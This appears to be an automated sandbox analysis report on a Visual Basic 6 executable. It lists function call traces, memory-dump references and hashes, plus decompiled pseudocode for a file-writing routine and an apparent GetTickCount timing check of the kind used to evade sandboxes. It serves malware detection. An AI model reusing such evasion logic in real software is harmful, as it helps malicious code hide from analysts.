                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004254B3
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004254CD
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?), ref: 004254F8
                                                                                                                                                        • WriteFile.KERNEL32(?,00401006,00000000,?,00000000), ref: 00425514
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0042551E
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 00425534
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 0042555D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$File$#644CreateLockRedimUnlockWriteZero
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4266029185-0
                                                                                                                                                        • Opcode ID: b4fb9a04f5ed2edf345e3e895cff842e2ebdb97eade0721d4266bcb95e308c51
                                                                                                                                                        • Instruction ID: 4730b2c3de92d9628cb7e1cddaa4c79fd08c8d7f1c743a22b0c93c28a8ad7ac6
                                                                                                                                                        • Opcode Fuzzy Hash: b4fb9a04f5ed2edf345e3e895cff842e2ebdb97eade0721d4266bcb95e308c51
                                                                                                                                                        • Instruction Fuzzy Hash: 1141A270A00258AFCB11DFA8DD89EAEBFB9FF0A710F11414AF105E7291C7749949CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425A20, Relevance: 12.1, APIs: 8, Instructions: 116COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000,660DC6D9,660DDE99,660DC6FC), ref: 00425A71
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425A9B
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00425ACB
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00425AEA
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00425B09
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00425B28
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 00425B4B
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00425B73
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Zero$EraseMoveRedim
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3541664652-0
                                                                                                                                                        • Opcode ID: 81709ea9f7aaad9931c28af01fa16c47f3cef45df764eb662eedbb0ac0904ac6
                                                                                                                                                        • Instruction ID: b544e07390ea98a35f87ec6e297df5ce5b4629193fa6ad0d18074df5fbcf98d4
                                                                                                                                                        • Opcode Fuzzy Hash: 81709ea9f7aaad9931c28af01fa16c47f3cef45df764eb662eedbb0ac0904ac6
                                                                                                                                                        • Instruction Fuzzy Hash: A0413CB0E002199FDB18CF98D899AAEBFB4FF48310F11411EE606AB351D770A944CFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428750, Relevance: 12.1, APIs: 8, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000,66106AEE,00000000,660DC30A), ref: 004287A1
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 004287D1
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 004287FC
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00428802
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00428822
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 0042883F
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 0042885F
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00428885
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Move$#644EraseRedim
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3032237109-0
                                                                                                                                                        • Opcode ID: 23fc8c4f21e1abd9d1c6d07ddd92b1a32646635aaa442ca7ee0e0d4a493e892f
                                                                                                                                                        • Instruction ID: 7fc5788c5f18ab7a21858dc564acd1cf0f72660f3b90189d39b9b992a513aa47
                                                                                                                                                        • Opcode Fuzzy Hash: 23fc8c4f21e1abd9d1c6d07ddd92b1a32646635aaa442ca7ee0e0d4a493e892f
                                                                                                                                                        • Instruction Fuzzy Hash: 32412BB0E002599FDB18DFA8D899AADFFB4FF58310F11411EE606AB291D774A944CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425470, Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 21%
                                                                                                                                                        			E00425470(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _OVERLAPPED* _v28;
				struct _OVERLAPPED* _v32;
				char _v36;
				char _v40;
				void** _v48;
				struct _OVERLAPPED* _v56;
				long _v60;
				WCHAR* _t37;
				void* _t38;
				intOrPtr _t42;
				long _t49;
				intOrPtr _t70;
				void* _t74;
				void* _t76;
				intOrPtr _t77;

				_t77 = _t76 - 8;
				 *[fs:0x0] = _t77;
				_v12 = _t77 - 0x2c;
				_v8 = 0x598178;
				_t37 = _a4;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				__imp__#644( *_t37, __edi, __esi, __ebx,  *[fs:0x0], 0x401006, _t74);
				_v60 = _t37;
				_t38 = CreateFileW(_t37, 0xc0000000, 3, 0, 2, 0x80, 0);
				_v28 = _t38;
				if(_t38 != 0xffffffff) {
					_t70 =  *_a8;
					_t49 = E004253DC(_t70);
					if(_t49 > 0) {
						_v60 = 0;
						__imp____vbaAryLock( &_v36, _t70);
						WriteFile(_v28,  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 0x14)), _t49,  &_v60, 0);
						__imp____vbaAryUnlock( &_v36);
					}
					__imp____vbaRedim(0x880, 0x10,  &_v40, 0, 1, 0, 0);
					_v56 = 0x4003;
					_v48 =  &_v28;
					__imp____vbaVarZero();
					_t42 =  *0x5991f4; // 0x0
					_t38 = L00425117( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xc)) + (0xc -  *((intOrPtr*)(_t42 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xc)) + (0xc -  *((intOrPtr*)(_t42 + 0x14))) * 4)),  &_v40);
					__imp____vbaErase(0,  &_v40);
					_v32 = 0xffffffff;
				}
				_push(E004255B3);
				return _t38;
			}




















                                                                                                                                                        0x00425473
                                                                                                                                                        0x00425482
                                                                                                                                                        0x0042548f
                                                                                                                                                        0x00425492
                                                                                                                                                        0x00425499
                                                                                                                                                        0x0042549e
                                                                                                                                                        0x004254a1
                                                                                                                                                        0x004254a6
                                                                                                                                                        0x004254aa
                                                                                                                                                        0x004254ad
                                                                                                                                                        0x004254b0
                                                                                                                                                        0x004254b3
                                                                                                                                                        0x004254ca
                                                                                                                                                        0x004254cd
                                                                                                                                                        0x004254d6
                                                                                                                                                        0x004254d9
                                                                                                                                                        0x004254e2
                                                                                                                                                        0x004254ea
                                                                                                                                                        0x004254ee
                                                                                                                                                        0x004254f5
                                                                                                                                                        0x004254f8
                                                                                                                                                        0x00425514
                                                                                                                                                        0x0042551e
                                                                                                                                                        0x0042551e
                                                                                                                                                        0x00425534
                                                                                                                                                        0x0042553d
                                                                                                                                                        0x00425544
                                                                                                                                                        0x0042555d
                                                                                                                                                        0x00425563
                                                                                                                                                        0x0042557d
                                                                                                                                                        0x00425587
                                                                                                                                                        0x0042558d
                                                                                                                                                        0x0042558d
                                                                                                                                                        0x00425594
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401006), ref: 004254B3
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004254CD
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?), ref: 004254F8
                                                                                                                                                        • WriteFile.KERNEL32(?,00401006,00000000,?,00000000), ref: 00425514
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0042551E
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 00425534
                                                                                                                                                        • __vbaVarZero.MSVBVM60 ref: 0042555D
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00425587
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$File$#644CreateEraseLockRedimUnlockWriteZero
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2317852514-0
                                                                                                                                                        • Opcode ID: ad42af8cf0bc1a3a80bf243ee1587cefa6fe378d12cadcc4e250365481f34a59
                                                                                                                                                        • Instruction ID: fa8f47af6c1c30fe21429def857a2937df1530329c4a825800884930df1a698f
                                                                                                                                                        • Opcode Fuzzy Hash: ad42af8cf0bc1a3a80bf243ee1587cefa6fe378d12cadcc4e250365481f34a59
                                                                                                                                                        • Instruction Fuzzy Hash: 64414F70A00219AFCB14DFA8D989EAEBFB9FF4D710F51410AF105A7290DB74A945CFA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00426800, Relevance: 12.1, APIs: 8, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaStrCat.MSVBVM60(00402938,00402930,66106AEE,660E6C30,660DC30A,?,?,?,00000000,00401006), ref: 00426844
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,00000000,00401006), ref: 00426851
                                                                                                                                                        • __vbaStrCat.MSVBVM60(00402940,00000000,?,?,?,00000000,00401006), ref: 00426859
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,00000000,00401006), ref: 00426860
                                                                                                                                                        • __vbaStrCat.MSVBVM60(00402948,00000000,?,?,?,00000000,00401006), ref: 00426868
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,00000000,00401006), ref: 0042686F
                                                                                                                                                        • #644.MSVBVM60(00000000,?,?,?,00000000,00401006), ref: 00426872
                                                                                                                                                        • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,00000000,00401006), ref: 00426889
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Move$#644FreeList
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 740860121-0
                                                                                                                                                        • Opcode ID: ff51bbc84d5655bce123bfc2af15feeb932884ee9bac7d66534fec7666f13010
                                                                                                                                                        • Instruction ID: 6866a6261d8b6947134c7301ed434f9672fd80eb80760e9fa89715ccdea67d20
                                                                                                                                                        • Opcode Fuzzy Hash: ff51bbc84d5655bce123bfc2af15feeb932884ee9bac7d66534fec7666f13010
                                                                                                                                                        • Instruction Fuzzy Hash: 5A11F1B1E40219ABDB01ABA48D4AFBF7BB8FB54700F514127E501B3190EA785905CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004273B0, Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • #593.MSVBVM60(?), ref: 004273F2
                                                                                                                                                        • __vbaNew2.MSVBVM60(004031DC,00000000), ref: 0042740E
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004031CC,00000024), ref: 0042742F
                                                                                                                                                        • __vbaR8IntI4.MSVBVM60 ref: 00427441
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 0042744D
                                                                                                                                                        • __vbaNew2.MSVBVM60(004016F0,00599268), ref: 00427466
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403114,000006FC), ref: 0042748D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$CheckHresultNew2$#593Free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2147906589-0
                                                                                                                                                        • Opcode ID: 3764029ce6bf120a0aa7208b058dfc2a1f314e5b6f405db3022dcbd4c29564a5
                                                                                                                                                        • Instruction ID: 87c6ef0a82ff40bf897a1ad2ddde9e910a4d30b76a181cdf885dd7b4f3fd2fe8
                                                                                                                                                        • Opcode Fuzzy Hash: 3764029ce6bf120a0aa7208b058dfc2a1f314e5b6f405db3022dcbd4c29564a5
                                                                                                                                                        • Instruction Fuzzy Hash: 22219F74641215FBDB00AF65ED49B9ABFB8FF15705F50002AF405A32A0C7789418DAA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428670, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaStrCopy.MSVBVM60(660E6C30,?,00000002), ref: 004286B0
                                                                                                                                                        • #632.MSVBVM60(?,?,?,?), ref: 004286E0
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?), ref: 004286EA
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 004286F5
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 004286FE
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(0042872E), ref: 00428727
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$FreeMove$#632Copy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3260605699-0
                                                                                                                                                        • Opcode ID: ace6996399027456d32270a9a5ae92100d0e6679988b9318005cbc22861bb032
                                                                                                                                                        • Instruction ID: 01656a184168e4246c3ecac29dffb0c164ee180a142c8f2aece2a702bee3938c
                                                                                                                                                        • Opcode Fuzzy Hash: ace6996399027456d32270a9a5ae92100d0e6679988b9318005cbc22861bb032
                                                                                                                                                        • Instruction Fuzzy Hash: 0411DAB1D00209EFCF04DFA5D849AEEBBB4FB59704F10841AE515A2250EB74650ACF95
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00426A90, Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                        			E00426A90(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				signed int _v60;
				long _t24;
				intOrPtr _t28;
				void* _t32;
				void* _t53;
				void* _t55;
				intOrPtr _t56;

				_t56 = _t55 - 8;
				 *[fs:0x0] = _t56;
				_v12 = _t56 - 0x28;
				_v8 = 0x598208;
				_v36 = 0;
				_v52 = 0;
				_t24 = GetTickCount();
				__imp____vbaRedim(0x880, 0x10,  &_v36, 0, 1, 0, 0, __edi, __esi, __ebx,  *[fs:0x0], 0x401006, _t53);
				_v44 = 0x1f4;
				_v52 = 3;
				_v60 =  *(_v36 + 0x14) << 4;
				__imp____vbaVarMove();
				_t28 =  *0x5991f4; // 0x0
				L00425117( *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)) + (9 -  *((intOrPtr*)(_t28 + 0x14))) * 4)),  &_v36);
				__imp____vbaErase(0,  &_v36);
				_t32 = GetTickCount() - _t24;
				_push(E00426B60);
				_v32 = (0 | _t32 - 0x000001f4 >= 0x00000000) - 1;
				return _t32;
			}
















                                                                                                                                                        0x00426a93
                                                                                                                                                        0x00426aa2
                                                                                                                                                        0x00426aaf
                                                                                                                                                        0x00426ab2
                                                                                                                                                        0x00426ac1
                                                                                                                                                        0x00426ac4
                                                                                                                                                        0x00426ac7
                                                                                                                                                        0x00426adb
                                                                                                                                                        0x00426ae4
                                                                                                                                                        0x00426aeb
                                                                                                                                                        0x00426afe
                                                                                                                                                        0x00426b09
                                                                                                                                                        0x00426b0f
                                                                                                                                                        0x00426b29
                                                                                                                                                        0x00426b33
                                                                                                                                                        0x00426b3b
                                                                                                                                                        0x00426b44
                                                                                                                                                        0x00426b4d
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00426AC7
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00426ADB
                                                                                                                                                        • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00426B09
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 00426B33
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00426B39
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$CountTick$EraseMoveRedim
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3563492539-0
                                                                                                                                                        • Opcode ID: 5f5e7a6286ebcdb3902ba3487febe60f90464ad6a07d91a68b9103b7dade1eff
                                                                                                                                                        • Instruction ID: 7b90f7a5e861f200e0b4b6abdbf524648be2192ea7c82eca57fd4796eeb2e07b
                                                                                                                                                        • Opcode Fuzzy Hash: 5f5e7a6286ebcdb3902ba3487febe60f90464ad6a07d91a68b9103b7dade1eff
                                                                                                                                                        • Instruction Fuzzy Hash: DF2178B0A00219AFDB04DFA9DD99EADBBB9FB48704F45411DF405A7281DB789804CF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00427880, Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaNew2.MSVBVM60(004030C8,005996EC), ref: 004278DB
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,005982A0), ref: 004278F1
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403204,00000010), ref: 0042790E
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427917
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$AddrefCheckFreeHresultNew2
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1649212984-0
                                                                                                                                                        • Opcode ID: 1ef5f6aa1871d7c3edb595e97f4205badb52b586c81a1b4266d22e7388510c1f
                                                                                                                                                        • Instruction ID: 3152bf76a5e1d72e6c81e6d71d3cb466977aa7dfa6d35d328210c86c57527201
                                                                                                                                                        • Opcode Fuzzy Hash: 1ef5f6aa1871d7c3edb595e97f4205badb52b586c81a1b4266d22e7388510c1f
                                                                                                                                                        • Instruction Fuzzy Hash: CA1186B4900204EFCB009F99CC49AAEBFB8FB59704F60812EF401A3291C7795949DF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004277B0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaNew2.MSVBVM60(004030C8,005996EC,?,?,?,?,?,?,?,?,00401006), ref: 00427808
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,00598290,?,?,?,?,?,?,?,?,00401006), ref: 0042781E
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403204,00000010,?,?,?,?,?,?,?,?,00401006), ref: 0042783B
                                                                                                                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401006), ref: 00427844
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$AddrefCheckFreeHresultNew2
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1649212984-0
                                                                                                                                                        • Opcode ID: fdf1dd76ad65a9691b120f27984b64729fb8e08d7846ff670520034d7e2bb637
                                                                                                                                                        • Instruction ID: 4199b86b2ce85ee7b66d3c533240b51c55df5e7eb6b8f637e9bd1618ff157d91
                                                                                                                                                        • Opcode Fuzzy Hash: fdf1dd76ad65a9691b120f27984b64729fb8e08d7846ff670520034d7e2bb637
                                                                                                                                                        • Instruction Fuzzy Hash: 34119875900208EFCB00AF99CC89A9EBFBCFB55704F60812EF501A3291C7795949DB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428D30, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 27%
                                                                                                                                                        			E00428D30(void* __ecx, void* __eflags, intOrPtr _a8) {
				intOrPtr* _v0;
				intOrPtr* _v4;
				intOrPtr _v8;
				signed int _t6;
				signed int _t8;
				intOrPtr _t19;
				intOrPtr* _t21;

				_t25 = __eflags;
				_t21 = __imp__#644;
				_t19 = _a8;
				_t6 = E0042543B(__eflags, 0x42541b,  *_t21(_t19));
				_t8 = E0042543B(_t25, 0x42542b,  *_t21(_t19));
				_push(_t19);
				if((_t6 | _t8 | E0042543B(_t25, 0x42540b,  *_t21())) == 0) {
					 *_v0 = 0;
					return 0x80004002;
				} else {
					_t20 = _v8;
					 *_v4 =  *_t21(_v8);
					E00428DB0(_t20);
					return 0;
				}
			}










                                                                                                                                                        0x00428d30
                                                                                                                                                        0x00428d33
                                                                                                                                                        0x00428d3a
                                                                                                                                                        0x00428d49
                                                                                                                                                        0x00428d59
                                                                                                                                                        0x00428d5e
                                                                                                                                                        0x00428d70
                                                                                                                                                        0x00428d95
                                                                                                                                                        0x00428da1
                                                                                                                                                        0x00428d72
                                                                                                                                                        0x00428d72
                                                                                                                                                        0x00428d7e
                                                                                                                                                        0x00428d80
                                                                                                                                                        0x00428d8b
                                                                                                                                                        0x00428d8b

                                                                                                                                                        APIs
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00428D41
                                                                                                                                                        • #644.MSVBVM60(?,0042541B,00000000), ref: 00428D51
                                                                                                                                                        • #644.MSVBVM60(?,0042542B,00000000), ref: 00428D61
                                                                                                                                                        • #644.MSVBVM60(?,0042540B,00000000), ref: 00428D77
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: #644
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 700137900-0
                                                                                                                                                        • Opcode ID: 5dceab7522cbafb01a65fdfedd6b2449917061fda7ca457c4253cfd564a969db
                                                                                                                                                        • Instruction ID: ef67db771e5897883cab37a114a83e8a90e04673f24aace79db4197f86822ff8
                                                                                                                                                        • Opcode Fuzzy Hash: 5dceab7522cbafb01a65fdfedd6b2449917061fda7ca457c4253cfd564a969db
                                                                                                                                                        • Instruction Fuzzy Hash: 30F0A4327002246E8200BBBAAC44F2FFB9CEBD1665B50442FF600D3151D9B9984586F9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042675E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
